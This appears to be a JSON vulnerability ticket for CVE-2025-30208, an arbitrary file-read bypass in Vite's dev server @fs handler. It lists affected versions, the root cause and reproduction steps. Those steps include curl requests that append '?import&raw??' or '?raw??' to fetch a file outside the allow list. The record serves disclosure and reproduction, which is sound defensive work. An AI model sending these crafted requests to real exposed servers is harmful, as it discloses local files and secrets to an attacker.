{
  "claim": {
    "argus_claim_ref": null,
    "attacker_control": null,
    "claimed_surface": "converter_document",
    "expected_impact": null,
    "finding_id": null,
    "id": null,
    "required_entrypoint_detail": null,
    "required_entrypoint_kind": "convert_document",
    "submission_reason": "ticket_derived",
    "trigger_class": "document_input",
    "upstream_verdicts": null
  },
  "latest_description": "## Summary\nVite’s dev server `@fs` access control can be bypassed by appending crafted query strings such as `?raw??` or `?import&raw??`, allowing reading arbitrary files outside the allowed serving list when the dev server is exposed to the network.\n\n## Affected Package\n- **Name:** vite\n- **Ecosystem:** npm\n- **Vulnerable versions:** >= 6.2.0 < 6.2.3, >= 6.1.0 < 6.1.2, >= 6.0.0 < 6.0.12, >= 5.0.0 < 5.4.15, < 4.5.10\n- **Patched versions:** 6.2.3, 6.1.2, 6.0.12, 5.4.15, 4.5.10\n\n## Details\nThe Vite dev server uses the `@fs` endpoint to serve files, denying access to paths outside the server’s allow list. However, the implementation removes trailing separators (such as `?`) in multiple places but does not account for them in query-string regex checks. By appending `?raw??` or `?import&raw??` to the URL, an attacker can bypass the `server.fs.deny` restriction and retrieve arbitrary file contents.\n\n**Impact:** Only applications explicitly exposing the Vite dev server to the network (using `--host` or `server.host`) are affected. This enables remote disclosure of local files.\n\n## Reproduction Steps\n**Environment setup**\n1. Install Node.js (LTS recommended).\n2. Create and run a Vite dev server:\n   ```bash\n   npm create vite@latest\n   cd vite-project\n   npm install\n   npm run dev\n   ```\n3. Create a file outside the project directory:\n   ```bash\n   echo \"top secret content\" > /tmp/secret.txt\n   ```\n\n**Steps**\n1. Request the file normally (expected denial):\n   ```bash\n   curl \"http://localhost:5173/@fs/tmp/secret.txt\"\n   ```\n2. Request the file with the crafted query string:\n   ```bash\n   curl \"http://localhost:5173/@fs/tmp/secret.txt?import&raw??\"\n   ```\n\n**Expected vs. vulnerable behavior**\n- Expected: server returns 403 “outside of Vite serving allow list.”\n- Vulnerable: server returns file contents (e.g., `top secret content`).\n\n## Indicators of Success\n- A 403 response for the normal request, and a successful response containing the file contents when using `?import&raw??` (or `?raw??`).\n\n## References\n- https://nvd.nist.gov/vuln/detail/CVE-2025-30208\n- https://github.com/advisories/GHSA-x574-m823-4x7w\n- https://github.com/vitejs/vite/commit/315695e9d97cc6cfa7e6d9e0229fb50cdae3d9f4\n- https://github.com/vitejs/vite/commit/80381c38d6f068b12e6e928cd3c616bd1d64803c\n- https://github.com/vitejs/vite/commit/807d7f06d33ab49c48a2a3501da3eea1906c0d41\n- https://github.com/vitejs/vite/commit/92ca12dc79118bf66f2b32ff81ed09e0d0bd07ca\n- https://github.com/vitejs/vite/commit/f234b5744d8b74c95535a7b82cc88ed2144263c1",
  "product": "npm:vite",
  "severity": "medium",
  "status": "open",
  "summary": "Vite dev server access control can be bypassed using crafted query strings, allowing arbitrary file reads via the @fs handler when the dev server is exposed to the network.",
  "ticket_id": "CVE-2025-30208"
}